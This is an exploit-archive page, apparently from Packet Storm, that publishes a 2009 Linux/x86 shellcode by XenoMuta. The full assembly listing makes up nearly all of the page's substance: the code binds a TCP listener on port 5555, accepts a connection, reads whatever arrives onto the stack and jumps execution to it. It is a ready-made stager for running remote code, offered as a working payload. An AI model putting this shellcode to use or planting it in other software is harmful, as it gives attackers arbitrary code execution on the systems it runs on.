what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 Listen And Jump Shellcode

Linux/x86 Listen And Jump Shellcode
Posted Sep 10, 2009
Authored by XenoMuta | Site xenomuta.tuxfamily.org

Linux/x86 listens for shellcode on tcp/5555 and jumps to it.

tags | x86, tcp, shellcode
systems | linux
SHA-256 | 592cc0af040a0d02896aad332ea74a6d3f35bef6cab581052cce6adf1a8f4b18

Linux/x86 Listen And Jump Shellcode

Change Mirror Download
/*
_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/

xenomuta\x40phreaker\x2enet
http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

Description:
linux/x86 listens for shellcode on tcp/5555 and jumps to it
OS: Linux
Arch: x86
Length: 83 bytes
Author: XenoMuta

greetz to:
str0k3 (tnx for your effort), emra (fragancia),
fr1t0l4y (dejate ver), garay (no me olvido de los pobres ;p )
- God bless you all -
*/
.global _start

_start:
xor %ebx, %ebx
mov %ebx, %eax

_socket:
push $0x6
push $0x1
push $0x2
mov $0x66, %al
incb %bl
mov %esp, %ecx
int $0x80

_bind:
mov %eax, %edi
xor %edx, %edx
push %edx
pushw $0xb315 /* 5555 */
pushw %bx
mov %esp, %ecx
push $0x10
push %ecx
push %edi
mov $0x66, %al
incb %bl
mov %esp, %ecx
int $0x80

_listen:
incb %bl
push $0x1
push %edi
mov $0x66, %al
incb %bl
mov %esp, %ecx
int $0x80

_accept:
push %edx
push %edx
push %edi
mov $0x66, %al
incb %bl
mov %esp, %ecx
int $0x80
mov %eax, %ebx

_read:
mov $0x3, %al
mov %esp, %ecx
mov $0x7ff, %dx
incb %dl
int $0x80
jmp *%ecx /* Jump to our shellcode */


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close